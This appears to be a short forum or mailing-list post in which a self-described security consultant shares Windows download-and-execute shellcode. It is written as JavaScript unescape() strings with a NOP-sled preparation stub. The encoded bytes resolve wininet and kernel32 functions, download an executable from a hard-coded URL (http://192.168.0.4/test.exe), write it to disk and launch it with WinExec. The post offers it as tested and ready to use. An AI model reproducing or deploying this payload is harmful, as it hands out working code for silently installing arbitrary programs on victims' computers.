Well,
this reverse shell works fine in my tests.
I am put a Download/Execute shellcode (
http://192.168.0.4/test.exe), see below:
prep_shellcode = unescape("%u9090%uBA90%u4142%u4142%uF281%u1111%u1111%u4190" +
"%u1139%uFA75%u9090%uF18B%uF88B%u9057%uc933%ub966" +
"%u00B4%ua5F3%u9090%u905f%ue7ff")
*** [NOTE: 360/2 = 180... B4 in HEXADECIMAL] ***
"%u5053%u5053%u9090%u9090%u4343%u4343%u5DEB%u8B5F%u80F7%u083F%u0375%u3780%u4708%u3F80"
+"%u7501%u33F2%uB5C9%u8B05%u2BFE%u8BF9%uB5EF%u2B03"
+"%u8BF9%uB2D7%u8B7C%u89E2%uFC75%u40B5%uE1C1%u8908"
+"%uF84D%u498D%u8B3C%u0309%uF84D%u498D%u417F%u098B"
+"%u4D03%u8BF8%u8BD9%u0C49%u4D03%u81F8%u4B39%u5245"
+"%u744E%u8D07%u145B%uCB8B%uEBEB%uC033%uEB53%uEB02"
+"%u8B7C%u0333%uF875%u7E80%u8003%u1474%u3E8B%u7D03"
+"%u47F8%u5647%u758B%u33FC%uB1C9%uF30D%u5EA6%u0674"
+"%u8D40%u0476%uE0EB%u8B5B%u105B%u5D03%uC1F8%u02E0"
+"%uD803%u038B%u4589%u8BF4%uFC5D%u5B8D%u530D%uD0FF"
+"%u4589%u8DF0%u095B%u8B53%uF445%uD0FF%u4589%u8BEC"
+"%uF045%u408B%u033C%uF045%u408B%u0378%uF045%u4589"
+"%u8BE8%u2040%u4503%u8DF0%u087B%uD233%u8B57%u0330"
+"%uF075%uC933%u0FB1%uA6F3%u0B74%uEB5F%uEB02%u427A"
+"%u408D%uEB04%u8BE7%uE85D%uC933%u5F53%u7F8B%u0324"
+"%uF07D%uE2D1%uFA03%u8B66%u8B0F%u1C5B%u5D03%uC1F0"
+"%u02E1%uD903%u1B8B%u5D03%u89F0%uE45D%u558B%u8DFC"
+"%u2D52%u7D8D%u33E0%uB1C9%u5106%u5252%u758B%u56F0"
+"%uFFFC%uFDD3%u5AAB%u3859%u742A%u4203%uF9EB%uE242"
+"%uB1E8%u5104%u5252%u758B%u56EC%uFFFC%uFDD3%u5AAB"
+"%u3859%u742A%u4203%uF9EB%uE242%uFCE8%u3352%uB6D2"
+"%uC11F%u08E2%u3352%uEBD2%uEB02%u527C%u458B%uFFD8"
+"%u5BD0%u4589%u33B8%u52D2%u5252%u5352%u458B%uFFC8"
+"%u89D0%uB445%u7B8D%u3308%u52D2%u80B6%uE2C1%u5210"
+"%uD233%u5252%u5057%u458B%uFFC4%u89D0%uB045%u558D"
+"%u52AC%uD233%u1FB6%uE2C1%u5208%u4D8B%u51B8%u8B50"
+"%uC045%uD0FF%u4D8B%u51B0%u458B%uFFBC%u8BD0%uB44D"
+"%u8B51%uBC45%uD0FF%uD233%u4352%u5343%u458B%uFFE0"
+"%u89D0%uA845%u7D8B%u57AC%u558B%u52B8%u8B50%uDC45"
+"%uD0FF%u558B%uEBA8%uEB02%u5217%u458B%uFFD4%u33D0"
+"%u52D2%u8B53%uD045%uD0FF%uD233%u8B52%uCC45%uD0FF"
+"%u0DE8%uFFFE%u4CFF%u616F%u4C64%u6269%u6172%u7972"
+"%u0841%u454B%u4E52%u4C45%u3233%u5708%u4E49%u4E49"
+"%u5445%u4708%u7465%u7250%u636F%u6441%u7264%u7365"
+"%u0873%u6C5F%u7263%u6165%u0874%u6C5F%u7277%u7469"
+"%u0865%u6C47%u626F%u6C61%u6C41%u6F6C%u0863%u6C5F"
+"%u6C63%u736F%u0865%u6957%u456E%u6578%u0863%u7845"
+"%u7469%u7250%u636F%u7365%u0873%u6E49%u6574%u6E72"
+"%u7465%u704F%u6E65%u0841%u6E49%u6574%u6E72%u7465"
+"%u704F%u6E65%u7255%u416C%u4908%u746E%u7265%u656E"
+"%u5274%u6165%u4664%u6C69%u0865%u6E49%u6574%u6E72"
+"%u7465%u6C43%u736F%u4865%u6E61%u6C64%u0865%u0872"
+"%u2E78%u7865%u0865%u7468%u7074%u2F3A%u312F%u3239"
+"%u312E%u3836%u302E%u342E%u742F%u7365%u2E74%u7865"
+"%u0065%u0108"
This is a Download/Execute shellcode.
Please test before use it.
Regards...
Igor Marcel - Vugo Verbal Killer (VUGO), <vugo"at"hotmail.com>
Information Security Consultant
"Linux is modism, BSD is a life style!"